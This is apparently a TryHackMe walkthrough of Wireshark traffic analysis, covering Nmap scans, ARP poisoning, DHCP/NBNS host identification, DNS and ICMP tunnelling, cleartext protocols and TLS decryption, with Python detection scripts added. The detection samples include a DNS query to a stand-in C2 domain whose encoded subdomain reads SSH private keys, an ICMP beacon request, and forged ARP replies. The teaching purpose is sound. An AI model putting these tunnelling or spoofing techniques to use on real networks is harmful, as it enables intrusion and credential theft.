Wireshark: Traffic Analysis TryHackMe Walkthrough

Learn the basics of traffic analysis with Wireshark and how to find anomalies on your network!

Cyber Rey
13 min read · Oct 20, 2023

This write-up covers the Wireshark: Traffic Analysis Room on TryHackMe and it is part of the SOC Level 1 Learning Path.

Module: Network Security and Traffic Analysis

Skill: Networking Tools, Wireshark

Setting up: start the room's VM and use it in the browser, or connect to THM's network via OpenVPN and reach the machine from your own host.

Task 1: Introduction

This room covers investigating packet-level details by combining analyst knowledge with Wireshark functionality to detect anomalies and odd situations in a given case.

Note that this is the third and last room of the Wireshark room trio; it is suggested that you visit the first two rooms listed below to practise and refresh your Wireshark skills before starting this one.
- Wireshark 101
- Wireshark: The Basics
- Wireshark: Packet Operations

Task 2: Nmap Scans

(image: TCP flags in a nutshell)

TCP Connect Scans

A TCP Connect scan relies on the full three-way handshake: the scanner completes the handshake with every open port before tearing the connection down.

  • Usually conducted with the nmap -sT command.
  • Used by non-privileged users (it is the only option for a non-root user, because it needs no raw sockets).
  • Usually has a window size larger than 1024 bytes, because the SYN is built by the operating system's TCP stack, which advertises its normal receive window; the connection is expected to carry data.

The images below show the three-way handshake against open and closed TCP ports. Images and pcap samples are split to make the investigation easier and to understand each case's details.

(image: the three-way handshake against open and closed TCP ports)

The images show the patterns in isolated traffic. It is not always easy to spot them in a large capture file, so analysts start with a generic filter that surfaces the initial anomaly pattern and then narrow down to a specific conversation.

tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size > 1024

This filter shows the TCP Connect scan pattern in a capture file: SYN-only packets whose advertised window is larger than 1024 bytes. The window-size split is a heuristic based on Nmap's defaults, not a property of the protocol, so check the rest of the handshake before drawing conclusions.

SYN Scans

A TCP SYN scan does not rely on the full three-way handshake (the scanner never sends the final ACK). It is:

  • Usually conducted with the nmap -sS command (TCP SYN port scan, Nmap's default when run as root).
  • Used by privileged users, because the scanner crafts raw packets.
  • Usually has a window size less than or equal to 1024 bytes, as the request is never completed and the scanner does not expect to receive data.

This filter shows the TCP SYN scan pattern in a capture file.

tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size <= 1024

The difference between a TCP Connect scan and a TCP SYN scan is in how the scanner reacts to the SYN/ACK from an open port: a Connect scan completes the handshake with an ACK and then tears the connection down (RST/ACK), whereas a SYN scan answers the SYN/ACK directly with a RST and never completes the handshake. Closed ports look the same in both cases: the target answers the SYN with a RST/ACK.

UDP Scans

A UDP scan does not involve a handshake, because UDP is connectionless.

  • Open ports usually give no response at all (unless the service answers the probe).
  • Closed ports trigger an ICMP Destination Unreachable message (type 3, code 3, "port unreachable").
  • Usually conducted with the nmap -sU command.

(image: UDP scans)

Closed (port 69) and open (port 68) UDP ports:

The ICMP error message embeds the original request (the IP header plus the first 8 bytes of the UDP datagram) so that the receiver knows which probe caused it. Once you expand the ICMP section in the packet details pane, you will see the encapsulated data and the original request, as shown in the image below.

(image: the ICMP error message with the encapsulated original request)

This filter shows the UDP scan pattern (closed ports) in a capture file.

icmp.type==3 and icmp.code==3

Detecting suspicious activity in small, chunked files is easy and a great way to learn how to focus on the details; the real challenge is repeating the same reasoning on a full capture.
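As an added example (not part of the room or this write-up), the following Python script applies the three display-filter heuristics above to raw IPv4 packets. The packets are constructed inline with struct so the script runs offline; the addresses, ports and window sizes are assumed values chosen to imitate the scan patterns, not data from the room's pcap.

```python
import struct
from collections import Counter

SYN, ACK = 0x02, 0x10  # TCP flag bits


def ip_bytes(ip):
    return bytes(map(int, ip.split(".")))


def ipv4(src, dst, proto, payload):
    """Minimal IPv4 header (IHL 5, no options; checksum left at zero) plus payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                      proto, 0, ip_bytes(src), ip_bytes(dst))
    return hdr + payload


def tcp(sport, dport, flags, window):
    """Minimal TCP header: data offset 5, no options, no payload."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, window, 0, 0)


def udp(sport, dport):
    return struct.pack("!HHHH", sport, dport, 8, 0)


def icmp_port_unreachable(original):
    """ICMP Destination Unreachable (type 3, code 3) quoting the original IP header + 8 bytes."""
    return struct.pack("!BBHI", 3, 3, 0, 0) + original[:28]


def classify(pkt):
    """Return (scan_kind, port) for a packet matching one of the three filters above, else None."""
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    body = pkt[ihl:]
    if proto == 6:  # tcp.flags.syn==1 and tcp.flags.ack==0, split on tcp.window_size
        sport, dport, _seq, _ack, _off, flags, window = struct.unpack("!HHIIBBH", body[:16])
        if flags & SYN and not flags & ACK:
            return ("connect", dport) if window > 1024 else ("syn", dport)
    elif proto == 1:  # icmp.type==3 and icmp.code==3: closed UDP port
        if body[0] == 3 and body[1] == 3:
            quoted = body[8:]                      # the original datagram, as sent by the scanner
            q_ihl = (quoted[0] & 0x0F) * 4
            dport = struct.unpack("!H", quoted[q_ihl + 2:q_ihl + 4])[0]
            return ("udp_closed", dport)
    return None


def summarize(packets):
    """Count matches per scan kind and collect the targeted ports."""
    counts, ports = Counter(), {}
    for pkt in packets:
        hit = classify(pkt)
        if hit:
            kind, port = hit
            counts[kind] += 1
            ports.setdefault(kind, []).append(port)
    return counts, ports


# Constructed sample traffic (assumed addresses; not the room's capture).
SCANNER, TARGET = "192.0.2.10", "192.0.2.20"
SAMPLE = [
    # nmap -sT style: the OS stack builds the SYN and advertises its normal window
    ipv4(SCANNER, TARGET, 6, tcp(40001, 22, SYN, 64240)),
    ipv4(SCANNER, TARGET, 6, tcp(40002, 80, SYN, 64240)),
    # nmap -sS style: raw SYNs with a small window
    ipv4(SCANNER, TARGET, 6, tcp(50000, 443, SYN, 1024)),
    ipv4(SCANNER, TARGET, 6, tcp(50000, 8080, SYN, 1024)),
    ipv4(SCANNER, TARGET, 6, tcp(50000, 8443, SYN, 1024)),
    # SYN/ACK from the target: excluded by the ack==0 condition
    ipv4(TARGET, SCANNER, 6, tcp(22, 40001, SYN | ACK, 65535)),
    # nmap -sU against closed ports: the target answers with ICMP port unreachable
    ipv4(TARGET, SCANNER, 1, icmp_port_unreachable(ipv4(SCANNER, TARGET, 17, udp(50001, 69)))),
    ipv4(TARGET, SCANNER, 1, icmp_port_unreachable(ipv4(SCANNER, TARGET, 17, udp(50001, 161)))),
]

if __name__ == "__main__":
    counts, ports = summarize(SAMPLE)
    for kind in ("connect", "syn", "udp_closed"):
        print(f"{kind:10s} {counts[kind]:3d}  ports={sorted(ports.get(kind, []))}")
```

The classifier mirrors the Wireshark filters field for field: the TCP branch tests the SYN and ACK bits and the window size, and the ICMP branch reads the destination port out of the quoted datagram, which is exactly the encapsulated data you expand in the packet details pane.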

Task 3: ARP Poisoning & Man in the Middle

ARP Poisoning/Spoofing (A.K.A. Man In The Middle Attack)

The Address Resolution Protocol (ARP) maps IP addresses to MAC addresses on a local network segment; without it, a host cannot deliver an IP packet to its next hop.

ARP Poisoning (also known as ARP Spoofing, and the usual way to build a Man In The Middle (MITM) position on a LAN) is an attack in which the adversary sends forged ARP packets to the victim and/or the default gateway. The aim is to manipulate their IP-to-MAC address tables so that the attacker's MAC is recorded for the gateway's (or the victim's) IP address; traffic between the two then flows through the attacker, who can sniff or alter it.

There are a variety of tools available to conduct ARP attacks. However, the mindset of the attack is static, so it is easy to detect such an attack by knowing the ARP protocol workflow and Wireshark skills!

ARP analysis in a nutshell

  • Works on the local network only (a single Layer 2 broadcast domain)
  • Resolves IP addresses to MAC addresses so hosts on the same segment can exchange frames
  • Not a secure protocol
  • Not a routable protocol
  • Has no authentication: any host can answer any request, or announce a mapping unasked
  • Common patterns are request and response, announcement and gratuitous packets.

Before investigating the traffic, let’s review some legitimate and suspicious ARP packets.

Legitimate requests look like the picture: a broadcast request asking which host uses an IP address, and a unicast reply from the host that owns that address.

A suspicious situation is having two different ARP responses (a conflict) for a particular IP address. In that case Wireshark's Expert Information (Analyze → Expert Information) warns the analyst about a duplicate IP address, and the display filter arp.duplicate-address-detected lists the packets involved.

However, the warning only marks the second occurrence of the duplicate value to highlight the conflict. Telling the malicious packet from the legitimate one is therefore the analyst's job. A possible IP spoofing case is shown in the picture below.

Here, knowing the network architecture and inspecting the traffic for a specific time frame can help detect the anomaly. As an analyst, you should take notes of your findings before going further. This will help you be organised and make it easier to correlate the further findings.

Look at the given picture: there is a conflict. The MAC address ending in "b4" crafted ARP requests with the "192.168.1.25" IP address and then claimed to have the "192.168.1.1" IP address as well.

The next steps include:

  • Inspect traffic to spot anomalies
  • Note that the case is split into multiple capture files to make the investigation easier
  • Discover a flood of ARP requests, which could indicate malicious activity, scan, or network problems
  • Identify a new anomaly: a MAC address that ends with “b4” is crafting multiple ARP requests with the “192.168.1.25” IP address
  • Focus on the source of this anomaly and extend the taken notes
  • Discover HTTP traffic, and add the source and destination MAC addresses as columns in the packet list pane to reveal which physical hosts sit behind the IP addresses
  • Identify another anomaly: the MAC address that ends with "b4" is the Ethernet destination of all HTTP packets even though the IP destination is the web server, indicating a MITM attack
  • Summarize the findings before concluding the investigation
  • Note that in traffic analysis, there are always alternative solutions available, depending on the analyst’s knowledge and skill level and the available data sources.
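As an added example that is not part of the room or this write-up, the following Python script parses raw Ethernet/ARP frames and reports the three anomalies the investigation above turns on: an IP address claimed by two MACs, a flood of requests from one MAC, and one MAC claiming several IP addresses. The frames and addresses (IANA documentation MACs 00:00:5e:00:53:xx) are constructed inline and are assumptions, not data from the room's pcap.

```python
import struct
from collections import Counter, defaultdict

ETHERTYPE_ARP = b"\x08\x06"
BROADCAST = b"\xff" * 6


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(map(int, ip.split(".")))


def arp_frame(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet (opcode 1 = request, 2 = reply)."""
    dst = BROADCAST if opcode == 1 else mac_bytes(target_mac)
    ethernet = dst + mac_bytes(sender_mac) + ETHERTYPE_ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return ethernet + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_ip) or None for a non-ARP frame."""
    if frame[12:14] != ETHERTYPE_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    sender_mac = frame[22:28].hex(":")
    sender_ip = ".".join(map(str, frame[28:32]))
    target_ip = ".".join(map(str, frame[38:42]))
    return opcode, sender_mac, sender_ip, target_ip


def analyze_arp(frames, flood_threshold=10):
    """Flag IP/MAC conflicts, request floods, and a single MAC claiming several IPs.

    Every ARP packet, request or reply, asserts "sender_ip is at sender_mac",
    so both opcodes feed the mapping; this is what makes a crafted request poisonous.
    """
    macs_per_ip = defaultdict(set)
    ips_per_mac = defaultdict(set)
    requests_per_mac = Counter()
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        opcode, sender_mac, sender_ip, _target_ip = parsed
        macs_per_ip[sender_ip].add(sender_mac)
        ips_per_mac[sender_mac].add(sender_ip)
        if opcode == 1:
            requests_per_mac[sender_mac] += 1
    return {
        "conflicts": {ip: sorted(macs) for ip, macs in macs_per_ip.items() if len(macs) > 1},
        "request_floods": {mac: n for mac, n in requests_per_mac.items() if n >= flood_threshold},
        "multi_ip_macs": {mac: sorted(ips) for mac, ips in ips_per_mac.items() if len(ips) > 1},
    }


# Constructed sample (assumed addresses; not the room's capture).
GATEWAY_MAC, VICTIM_MAC, ATTACKER_MAC = "00:00:5e:00:53:01", "00:00:5e:00:53:0c", "00:00:5e:00:53:b4"
SAMPLE = [
    # legitimate resolution of the gateway by the victim
    arp_frame(1, VICTIM_MAC, "192.168.1.12", "00:00:00:00:00:00", "192.168.1.1"),
    arp_frame(2, GATEWAY_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.12"),
]
# the attacker sweeps the subnet with requests, presenting 192.168.1.25 as its own address
SAMPLE += [arp_frame(1, ATTACKER_MAC, "192.168.1.25", "00:00:00:00:00:00", f"192.168.1.{host}")
           for host in range(100, 112)]
# the attacker then tells the victim that the gateway IP lives at the attacker's MAC
SAMPLE.append(arp_frame(2, ATTACKER_MAC, "192.168.1.1", VICTIM_MAC, "192.168.1.12"))

if __name__ == "__main__":
    report = analyze_arp(SAMPLE)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The flood threshold is deliberately a parameter: a legitimate host booting up, or a monitoring tool, also sends bursts of requests, so the number should come from a baseline of the network you are looking at, and the conflict and multi-IP findings are what turn a noisy MAC into a suspect.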

Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos

Identifying Hosts

When investigating a compromise or malware infection, a security analyst should know how to identify the hosts on the network beyond matching IP addresses to MAC addresses.

One of the best methods is identifying the hosts and users on the network, both to decide where to start the investigation and to list the hosts and users associated with the malicious traffic or activity. Enterprise networks usually follow a predefined naming pattern for users and hosts. This makes the inventory easier to follow, but it cuts both ways.

The good side is that a user or host can be identified just by looking at its name.

The bad side is that an adversary can clone the pattern and blend into the enterprise network.

There are controls that limit this kind of activity, but host and user identification remains an essential skill for a security analyst.

Protocols that can be used in Host and User identification:

  • Dynamic Host Configuration Protocol (DHCP) traffic
  • NetBIOS (NBNS) traffic
  • Kerberos traffic

DHCP Analysis

(image: DHCP analysis in Wireshark)

NetBIOS (NBNS) Analysis

NetBIOS (Network Basic Input/Output System) is the technology that allows applications on different hosts of a local network to communicate with each other. Its name service, NBNS, maps NetBIOS names to IP addresses; name registration and query packets carry the hostname in cleartext, which makes them a quick way to tie a name to an IP address.

(image: NetBIOS (NBNS) analysis in Wireshark)

Kerberos Analysis

Kerberos is the default authentication service for Microsoft Windows domains. It authenticates service requests between two or more computers over an untrusted network; the ultimate aim is to prove identity securely. For host and user identification, the client principal name (CNameString) and realm in AS-REQ and TGS-REQ packets reveal the user or the computer account (computer accounts end in $) behind an IP address.
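As an added example that is not part of the room or this write-up, the following Python script shows the two protocol details an analyst leans on when naming hosts from DHCP and NBNS traffic: the DHCP option block (option 53 message type, option 12 host name, option 50 requested IP) read next to the client MAC, and the NetBIOS first-level name encoding that turns a 16-byte name into the 32 letters seen in NBNS packets. The packets, hostnames and addresses are constructed inline and are assumptions, not data from the room's captures.

```python
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
MESSAGE_TYPES = {1: "Discover", 2: "Offer", 3: "Request", 4: "Decline",
                 5: "ACK", 6: "NAK", 7: "Release", 8: "Inform"}


def ip_bytes(ip):
    return bytes(map(int, ip.split(".")))


def dhcp_packet(mac, message_type, hostname, requested_ip=None, xid=0x3903F326):
    """Build a BOOTP/DHCP client message: 236-byte fixed header, magic cookie, then options."""
    chaddr = bytes.fromhex(mac.replace(":", "")).ljust(16, b"\x00")
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 1, 1, 6, 0, xid, 0, 0x8000,
                        b"\x00" * 4, b"\x00" * 4, b"\x00" * 4, b"\x00" * 4,
                        chaddr, b"\x00" * 64, b"\x00" * 128)
    options = bytes([53, 1, message_type])                      # option 53: DHCP message type
    options += bytes([12, len(hostname)]) + hostname.encode()   # option 12: host name
    if requested_ip:
        options += bytes([50, 4]) + ip_bytes(requested_ip)      # option 50: requested IP address
    return fixed + MAGIC_COOKIE + options + b"\xff"


def parse_dhcp(packet):
    """Extract the fields that tie a hostname to a MAC and an IP address."""
    if packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    hlen = packet[2]
    mac = packet[28:28 + hlen].hex(":")                         # chaddr starts at offset 28
    options, i = {}, 240
    while i < len(packet) and packet[i] != 255:                 # 255 = end option
        if packet[i] == 0:                                       # 0 = pad, no length byte
            i += 1
            continue
        code, length = packet[i], packet[i + 1]
        options[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return {
        "mac": mac,
        "type": MESSAGE_TYPES.get(options[53][0], "unknown"),
        "hostname": options[12].decode(errors="replace") if 12 in options else None,
        "requested_ip": ".".join(map(str, options[50])) if 50 in options else None,
    }


def nbns_encode(name, suffix=0x00):
    """NetBIOS first-level encoding: 15-char space-padded name plus a suffix byte,
    each nibble mapped onto 'A'..'P', giving the 32-character label seen on the wire."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def nbns_decode(encoded):
    """Reverse of nbns_encode: returns (name, suffix). The suffix identifies the service,
    e.g. 0x00 workstation, 0x20 file server."""
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def identify_hosts(packets):
    """(hostname, mac, requested_ip) for every DHCP Request, the tuple that names a host on the wire."""
    return [(p["hostname"], p["mac"], p["requested_ip"])
            for p in map(parse_dhcp, packets) if p["type"] == "Request"]


# Constructed sample (assumed hostnames and addresses; not the room's capture).
SAMPLE = [
    dhcp_packet("00:00:5e:00:53:11", 1, "LAB-WS01"),
    dhcp_packet("00:00:5e:00:53:11", 3, "LAB-WS01", "192.0.2.85"),
    dhcp_packet("00:00:5e:00:53:22", 3, "android-phone", "192.0.2.90"),
]

if __name__ == "__main__":
    for host in identify_hosts(SAMPLE):
        print("DHCP Request:", host)
    print("NBNS:", nbns_decode(nbns_encode("LAB-WS01", 0x20)))
```

The Request (not the Discover) is the message to key on, because it is the one that carries the address the client is asking for; the ACK from the server then confirms it. For NBNS, decoding the name is what lets you filter on a readable workstation name instead of the 32-letter blob.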

Task 5: Tunneling Traffic: DNS and ICMP

Traffic tunnelling means carrying one protocol's data inside another protocol (port forwarding is one common use of it) to move data or reach resources across network segments and zones. It works in both directions, internet to private network and private network to internet. The inner packets are encapsulated, so the carrier traffic looks ordinary for its protocol while it actually transports private data to the final destination.

Tunnelling provides privacy for the inner traffic and, when the tunnel is encrypted, confidentiality as well. It is therefore heavily used in enterprise networks. For the same reason, attackers use tunnelling to bypass security perimeters, hiding their traffic inside standard and trusted protocols that appear in everyday traffic, such as ICMP and DNS.

Therefore, it is crucial for a security analyst to be able to spot ICMP and DNS anomalies.

ICMP Analysis

The Internet Control Message Protocol (ICMP) is designed for diagnosing and reporting network communication issues and is heavily used for error reporting and testing. Because it is normally allowed through the network, it is sometimes abused for denial of service (DoS) attacks, and adversaries use it for data exfiltration and C2 tunnelling.

A large volume of ICMP traffic or anomalous packet sizes are indicators of ICMP tunnelling. Adversaries can, however, craft packets that match the regular size of an echo request (on Linux, ping sends 56 bytes of payload, 64 bytes with the ICMP header; Windows ping sends 32 bytes of payload), so detecting tunnelling remains cumbersome. A security analyst should know what normal and abnormal ICMP looks like (payload size, request/reply ratio, and printable content inside the payload) in order to spot a possible anomaly and escalate it for further analysis.

DNS Analysis

Similar to ICMP tunnels, DNS tunnelling appears after malware execution or vulnerability exploitation. The adversary registers (or already owns) a domain and configures its authoritative server as a C2 channel. The malware, or the commands executed after exploitation, sends DNS queries to that server. These queries are longer than typical DNS queries and are crafted as subdomains of the attacker's domain. The subdomain labels are not real host names; they are encoded commands or data, for example:

"encoded-commands.maliciousdomain.com"

When the query is routed to the C2 server, the server sends the actual malicious commands back to the host, typically inside the response record. As DNS queries are a natural part of network activity, these packets have a good chance of passing through the network perimeter unnoticed. A security analyst should know how to investigate query name lengths (dns.qry.name.len), query types and target domains to spot these anomalies.
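As an added example that is not part of the room or this write-up, the following Python script implements the two checks described in this task: it decodes the query name out of raw DNS messages, groups queries by domain and flags names that are unusually long or whose subdomain has the high character entropy of encoded data, and it checks ICMP echo payloads against the usual ping sizes while showing a printable preview of what rides inside. The messages, domain names and payloads are constructed inline and are assumptions, not data from the room's captures; so are the length and entropy thresholds and the "last two labels" notion of a registered domain.

```python
import math
import struct
from collections import Counter, defaultdict


def entropy(text):
    """Shannon entropy in bits per character; encoded payloads score high, plain words score low."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def dns_query(qname, qtype=16, txid=0x1234):
    """Standard DNS query message (header + one question); qtype 16 = TXT, 1 = A."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = b"".join(bytes([len(label)]) + label.encode() for label in qname.split(".")) + b"\x00"
    return header + question + struct.pack("!HH", qtype, 1)


def parse_query(message):
    """Return (qname, qtype) from the first question; uncompressed names only, which is all a query carries."""
    labels, i = [], 12
    while message[i]:
        length = message[i]
        labels.append(message[i + 1:i + 1 + length].decode())
        i += 1 + length
    qtype = struct.unpack("!H", message[i + 1:i + 3])[0]
    return ".".join(labels), qtype


def dns_report(messages, max_len=52, max_entropy=3.5):
    """Group queries by registered domain (assumed here to be the last two labels, ignoring public
    suffixes) and flag names that are long or whose subdomain looks encoded."""
    report = defaultdict(lambda: {"queries": 0, "flagged": 0, "types": Counter()})
    for msg in messages:
        qname, qtype = parse_query(msg)
        labels = qname.split(".")
        domain = ".".join(labels[-2:])
        subdomain = ".".join(labels[:-2])
        entry = report[domain]
        entry["queries"] += 1
        entry["types"][qtype] += 1
        if len(qname) > max_len or entropy(subdomain) > max_entropy:
            entry["flagged"] += 1
    return dict(report)


def icmp_echo(payload, ident=0x1234, seq=1):
    return struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload


def icmp_check(packet, expected_sizes=(32, 56)):
    """Flag echo payloads whose size differs from the usual ping defaults (assumed: 56 bytes on Linux,
    32 on Windows) and give a printable preview so the analyst can see what protocol is inside."""
    payload = packet[8:]
    preview = "".join(chr(b) if 32 <= b < 127 else "." for b in payload[:32])
    return {"size": len(payload), "anomalous": len(payload) not in expected_sizes, "preview": preview}


# Constructed samples (assumed names and payloads; not the room's captures).
LINUX_PING_PAYLOAD = bytes(8) + bytes(range(0x10, 0x40))   # 8-byte timestamp + 48-byte pattern
DNS_SAMPLE = [
    dns_query("www.example.org", qtype=1),
    dns_query("mail.example.org", qtype=1),
    dns_query("aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Qgb2YgdGhlIHR1bm5lbA.c2-tunnel.example"),
    dns_query("bHMgLWxhIC9ob21lL3VzZXIvLnNzaCAmJiBjYXQgaWRfcnNh.c2-tunnel.example"),
    dns_query("ping.c2-tunnel.example", qtype=1),
]
ICMP_SAMPLE = [
    icmp_echo(LINUX_PING_PAYLOAD),
    icmp_echo(b"GET /beacon HTTP/1.1\r\nHost: c2-tunnel.example\r\n\r\n"),
]

if __name__ == "__main__":
    for domain, entry in dns_report(DNS_SAMPLE).items():
        print(f"{domain}: {entry['queries']} queries, {entry['flagged']} flagged, types={dict(entry['types'])}")
    for pkt in ICMP_SAMPLE:
        print(icmp_check(pkt))
```

Grouping by domain matters more than any single query: one long name is noise, but a domain that only ever receives long, high-entropy TXT queries from one host is the pattern to escalate. The same goes for ICMP, where a size check alone is weak and the payload preview is what tells you whether an ordinary ping pattern or a foreign protocol is inside.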

Task 6: Cleartext Protocol Analysis: FTP

Cleartext Protocol Analysis: investigating cleartext protocol traces sounds easy, but when the time comes to investigate a big network trace for incident analysis and response, the game changes. Proper analysis is more than following the stream and reading the cleartext data. For a security analyst, it is important to produce statistics and key results from the investigation process.

FTP Analysis

FTP response codes for grabbing the low-hanging fruit:

  • x1x series: information responses.
  • x2x series: connection messages.
  • x3x series: authentication and accounting messages.

Note: "200" means command okay. In a login context, "230" means the user logged in successfully and "530" means not logged in (login incorrect), so counting 530 responses gives the number of failed attempts.

(image: FTP analysis in Wireshark)

Task 7: Cleartext Protocol Analysis: HTTP

(image: cleartext protocol analysis, HTTP)

User Agent Analysis

For a security analyst, it is important to spot anomaly signs in the bits and pieces of the packets. The "User-Agent" header is one of the best resources for spotting anomalies in HTTP traffic. In some cases, adversaries modify the User-Agent value so that it looks entirely natural.

A security analyst cannot rely only on the User-Agent field to spot an anomaly. Never whitelist a user agent, even if it looks natural. User-agent-based detection and hunting is an additional data source to check and is useful when there is an obvious anomaly: an attack tool's default string, a lookup payload such as a Log4j JNDI string, or a subtle misspelling of a well-known browser string. If you are unsure about a value, conduct a web search to validate your findings against the default and normal user-agent strings (example site).

Log4j Analysis

(image: Log4j analysis in Wireshark)

Task 8: Encrypted Protocol Analysis: Decrypting HTTPS

Decrypting HTTPS Traffic

When investigating web traffic, analysts often run across encrypted traffic. This is caused by the use of the Hypertext Transfer Protocol Secure (HTTPS) protocol, which protects against spoofing, sniffing and interception attacks.

HTTPS uses the TLS protocol to encrypt communications, so the transferred data cannot be viewed without the session keys. Wireshark can decrypt TLS when it is given those keys: either the server's RSA private key (which only works for RSA key exchange without forward secrecy) or, more commonly, a key log file in the NSS SSLKEYLOGFILE format written by the browser, loaded via Edit → Preferences → Protocols → TLS → (Pre)-Master-Secret log filename. As HTTPS provides a good level of security for transmitting sensitive data, attackers and malicious websites use it too. Therefore, a security analyst should know how to use key files to decrypt the traffic and investigate the activity.

Because the HTTP traffic is encrypted, Wireshark colours these packets as TLS rather than HTTP, and the protocol and Info columns show only record types (Client Hello, Application Data) rather than the actual URL and the data returned by the server.

(image: HTTP packets encrypted with the TLS protocol)

The TLS handshake starts with the "Client Hello" and "Server Hello" messages. The filters below show the initial hello packets in a capture file and help identify which IP addresses are involved in the handshake. The http.request term keeps plaintext HTTP requests in the same view, and !(ssdp) removes SSDP discovery noise.

  • Client Hello: (http.request or tls.handshake.type == 1) and !(ssdp)
  • Server Hello: (http.request or tls.handshake.type == 2) and !(ssdp)

To find the Client Hello for one specific site, filter on the Server Name Indication extension instead, for example tls.handshake.extensions_server_name contains "google".

(image: filtering HTTP and TLS hello packets without a key log file)
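As an added example that is not part of the room or this write-up, the following Python script parses the Client Hello record of a TLS handshake the way the tls.handshake.type == 1 filter does, reads the Server Name Indication extension, and returns the 1-based position of the first Client Hello for a given host name, the analogue of a Wireshark frame number. The records (including a zeroed 32-byte random and a minimal Server Hello that the parser must skip) are constructed inline and are assumptions, not data from the room's Exercise.pcap.

```python
import struct

HANDSHAKE, CLIENT_HELLO, SERVER_HELLO, SNI_EXTENSION = 0x16, 1, 2, 0


def client_hello(server_name, cipher_suites=(0x1301, 0x1302, 0xC02B)):
    """TLS record carrying a minimal ClientHello with only the server_name extension.
    The 32-byte random is zeroed here for reproducibility; a real client fills it randomly."""
    name = server_name.encode("ascii")
    sni_list = struct.pack("!BH", 0, len(name)) + name             # name_type 0 = host_name
    sni_data = struct.pack("!H", len(sni_list)) + sni_list
    extensions = struct.pack("!HH", SNI_EXTENSION, len(sni_data)) + sni_data
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (b"\x03\x03" + bytes(32) + b"\x00"                         # version, random, empty session id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                                             # one compression method: null
            + struct.pack("!H", len(extensions)) + extensions)
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE, 0x03, 0x01]) + struct.pack("!H", len(handshake)) + handshake


def server_hello(cipher_suite=0x1301):
    """Minimal ServerHello record, used here only to show that the parser skips it."""
    body = b"\x03\x03" + bytes(32) + b"\x00" + struct.pack("!H", cipher_suite) + b"\x00"
    handshake = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE, 0x03, 0x03]) + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(record):
    """Return {'version', 'cipher_suites', 'sni'} for a ClientHello record, else None."""
    if len(record) < 6 or record[0] != HANDSHAKE:
        return None
    hs = record[5:]
    if hs[0] != CLIENT_HELLO:                              # tls.handshake.type == 1
        return None
    i = 4                                                  # skip handshake type + 3-byte length
    version = struct.unpack("!H", hs[i:i + 2])[0]
    i += 2 + 32                                            # client_version, random
    i += 1 + hs[i]                                         # session id
    suites_len = struct.unpack("!H", hs[i:i + 2])[0]
    i += 2
    suites = [struct.unpack("!H", hs[j:j + 2])[0] for j in range(i, i + suites_len, 2)]
    i += suites_len
    i += 1 + hs[i]                                         # compression methods
    sni = None
    if i + 2 <= len(hs):
        end = i + 2 + struct.unpack("!H", hs[i:i + 2])[0]
        i += 2
        while i + 4 <= end:
            ext_type, ext_len = struct.unpack("!HH", hs[i:i + 4])
            i += 4
            if ext_type == SNI_EXTENSION:
                # server_name_list length (2), then name_type (1), name length (2), name
                name_len = struct.unpack("!H", hs[i + 3:i + 5])[0]
                sni = hs[i + 5:i + 5 + name_len].decode("ascii")
            i += ext_len
    return {"version": version, "cipher_suites": suites, "sni": sni}


def find_client_hello(records, server_name):
    """1-based index (the analogue of Wireshark's frame number) of the first ClientHello for server_name."""
    for number, record in enumerate(records, 1):
        hello = parse_client_hello(record)
        if hello and hello["sni"] == server_name:
            return number
    return None


# Constructed sample stream (assumed order; not the room's capture).
SAMPLE = [
    client_hello("www.example.org"),
    server_hello(),
    client_hello("accounts.google.com"),
    server_hello(),
]

if __name__ == "__main__":
    for number, record in enumerate(SAMPLE, 1):
        print(number, parse_client_hello(record))
    print("Client Hello for accounts.google.com is record", find_client_hello(SAMPLE, "accounts.google.com"))
```

The SNI is sent in the clear even though everything after the handshake is encrypted, which is why it is the one field that names the destination site without any key material; with a key log file loaded, the same conversation then decrypts down to the HTTP/2 headers and bodies.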

Task 9: Bonus: Hunt Cleartext Credentials!

Sometimes anomalies replicate the legitimate traffic, so the detection becomes harder. For example, in a cleartext credential hunting case, it is not easy to spot the multiple credential inputs and decide if there is a brute-force attack or if it is a standard user who mistyped their credentials.

As everything is presented at the packet level, it is hard to spot the multiple username/password entries at first glance. The detection time will decrease when an analyst can view the credential entries as a list. Wireshark has such a feature to help analysts who want to hunt cleartext credential entries.

